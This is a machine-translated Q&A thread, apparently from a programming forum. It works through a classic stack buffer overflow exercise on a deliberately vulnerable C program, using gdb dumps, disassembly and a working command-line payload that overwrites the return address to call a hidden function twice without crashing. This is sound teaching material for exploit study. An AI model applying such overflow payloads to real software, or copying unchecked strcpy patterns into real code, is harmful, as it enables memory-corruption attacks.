对于我的学习,我尝试创建一个有效载荷,使其溢出缓冲区并调用一个名为“target”的“秘密”函数
这是我用于在i686上进行测试的代码
#include "stdio.h"
#include "string.h"
void target() {
printf("target\n");
}
void vulnerable(char* input) {
char buffer[16];
strcpy(buffer, input);
}
int main(int argc, char** argv) {
if(argc == 2)
vulnerable(argv[1]);
else
printf("Need an argument!");
return 0;
}
任务1 :创建一个有效负载,以便调用target()。 通过将EIP替换为目标函数的地址,这很容易做到。
这是缓冲区的外观
Buffer
(gdb) x/8x buffer
0xbfffef50: 0x41414141 0x41414141 0x00414141 0x08048532
0xbfffef60: 0x00000002 0xbffff024 0xbfffef88 0x080484ca
我使用的有效负载是:
run AAAAAAAAAAAAAAAAAAAAAAAAAAAA$'\x7d\x84\x04\x08'
这样可以正常工作,但会因分段错误而停止。
任务2:以不会出现细分错误的方式修改有效负载
这是我被困的地方。显然它会导致分段错误,因为我们不使用调用指令调用目标,因此没有有效的返回地址。
我试图在堆栈上添加返回地址,但这没有帮助
run AAAAAAAAAAAAAAAAAAAAAAAA$'\xca\x84\x04\x08'$'\x7d\x84\x04\x08'
也许有人可以帮我解决这个问题。可能我还要添加已保存的主要EBP?
我附上了程序的objdump
0804847d <target>:
804847d: 55 push %ebp
804847e: 89 e5 mov %esp,%ebp
8048480: 83 ec 18 sub $0x18,%esp
8048483: c7 04 24 70 85 04 08 movl $0x8048570,(%esp)
804848a: e8 c1 fe ff ff call 8048350 <puts@plt>
804848f: c9 leave
8048490: c3 ret
08048491 <vulnerable>:
8048491: 55 push %ebp
8048492: 89 e5 mov %esp,%ebp
8048494: 83 ec 28 sub $0x28,%esp
8048497: 8b 45 08 mov 0x8(%ebp),%eax
804849a: 89 44 24 04 mov %eax,0x4(%esp)
804849e: 8d 45 e8 lea -0x18(%ebp),%eax
80484a1: 89 04 24 mov %eax,(%esp)
80484a4: e8 97 fe ff ff call 8048340 <strcpy@plt>
80484a9: c9 leave
80484aa: c3 ret
080484ab <main>:
80484ab: 55 push %ebp
80484ac: 89 e5 mov %esp,%ebp
80484ae: 83 e4 f0 and $0xfffffff0,%esp
80484b1: 83 ec 10 sub $0x10,%esp
80484b4: 83 7d 08 02 cmpl $0x2,0x8(%ebp)
80484b8: 75 12 jne 80484cc <main+0x21>
80484ba: 8b 45 0c mov 0xc(%ebp),%eax
80484bd: 83 c0 04 add $0x4,%eax
80484c0: 8b 00 mov (%eax),%eax
80484c2: 89 04 24 mov %eax,(%esp)
80484c5: e8 c7 ff ff ff call 8048491 <vulnerable>
80484ca: eb 0c jmp 80484d8 <main+0x2d>
80484cc: c7 04 24 77 85 04 08 movl $0x8048577,(%esp)
80484d3: e8 58 fe ff ff call 8048330 <printf@plt>
80484d8: b8 00 00 00 00 mov $0x0,%eax
80484dd: c9 leave
80484de: c3 ret
80484df: 90 nop
答案 0 :(得分:2)
您需要足够的数据来填充堆栈的保留内存,其中包含缓冲区&#39;找到,然后更多地覆盖堆栈帧指针,然后覆盖地址为target()的返回地址,然后在target()内再覆盖一个地址,但不在函数的最开头 - 输入它旧堆栈帧指针未被压入堆栈。这将导致您运行目标而不是从vulnerable()正确返回,然后再次运行target(),以便从target()返回main(),然后退出而不会出现分段错误。
当我们第一次进入易受攻击的()并且即将放入数据时 进入&#39;缓冲区&#39;变量堆栈看起来像这样:
-----------
| 24-bytes of local storage - 'buffer' lives here
-----------
| old stack frame pointer (from main) <-- EBP points here
-----------
| old EIP (address in main)
-----------
| 'input' argument for 'vulnerable'
-----------
| top of stack for main
-----------
| ... more stack here ...
首先从&#39;缓冲区&#39;的地址开始我们需要输入24字节的垃圾 通过堆栈上保留的本地存储,然后再获取4个字节 过去堆栈中存储的旧堆栈帧指针,然后我们就在了 旧EIP存储的位置。这是CPU盲目跟随的指令指针。我们喜欢他。他会帮我们粉碎这个节目。我们覆盖堆栈中旧EIP的值,该堆栈当前指向main()中的地址,其中target()的起始地址是通过gdb找到的 反汇编命令:
(gdb) disas target
Dump of assembler code for function target:
0x08048424 <+0>: push %ebp
0x08048425 <+1>: mov %esp,%ebp
0x08048427 <+3>: sub $0x18,%esp
0x0804842a <+6>: movl $0x8048554,(%esp)
0x08048431 <+13>: call 0x8048354 <puts@plt>
0x08048436 <+18>: leave
0x08048437 <+19>: ret
End of assembler dump.
target()函数的地址是0x08048424。由于(我的系统至少)系统是小端,我们首先用LSB输入这些值,所以x24,x84,x04和x08。
但是这给我们留下了一个问题,因为当易受攻击的()返回时,它会弹出所有内容 我们放入堆栈中的垃圾堆,我们留下了堆栈 当我们即将在target()中处理时,它看起来像这样 第一次:
-----------
| 'input' argument for 'vulnerable'
-----------
| top of stack for main
-----------
| ... more stack here ...
因此当target()想要返回时,它将找不到返回地址 它的堆栈顶部符合预期,因此会出现分段错误。
因此我们希望在我们之前强制将新的返回值强加到堆栈的顶部 在target()中开始处理。但选择什么价值?我们不想推 EBP因为它包含垃圾。记得?当我们覆盖“缓冲”时,我们把垃圾塞进去。所以改为在
之后推送target()指令 push %ebp
(在本例中为地址0x08048425)。
这意味着当target()准备返回时,堆栈将如下所示 这是第一次:
-----------
| address of mov %esp, %ebp instruction in target()
-----------
| top of stack for main
-----------
| ... more stack here ...
因此,第一次从target()返回时,EIP将指向target()中的第二条指令,这意味着我们第二次处理target()时它与main()具有相同的堆栈什么时候处理堆栈的顶部与main()的堆栈顶部相同。现在堆栈看起来像:
-----------
| top of stack for main
-----------
| ... more stack here ...
因此,当target()第二次返回时,它有一个好的堆栈返回 因为它使用的是main()所使用的相同堆栈,因此程序正常退出。
总而言之,它是28字节,后跟target()中第一条指令的地址,后跟target()中第二条指令的地址。
sys1:/usr2/home> ./buggy AAAAAAAAAABBBBBBBBBBCCCCCCCC$'\x24\x84\x04\x08'$'\x25\x84\x04\x08'
target
target
sys1:/usr2/home>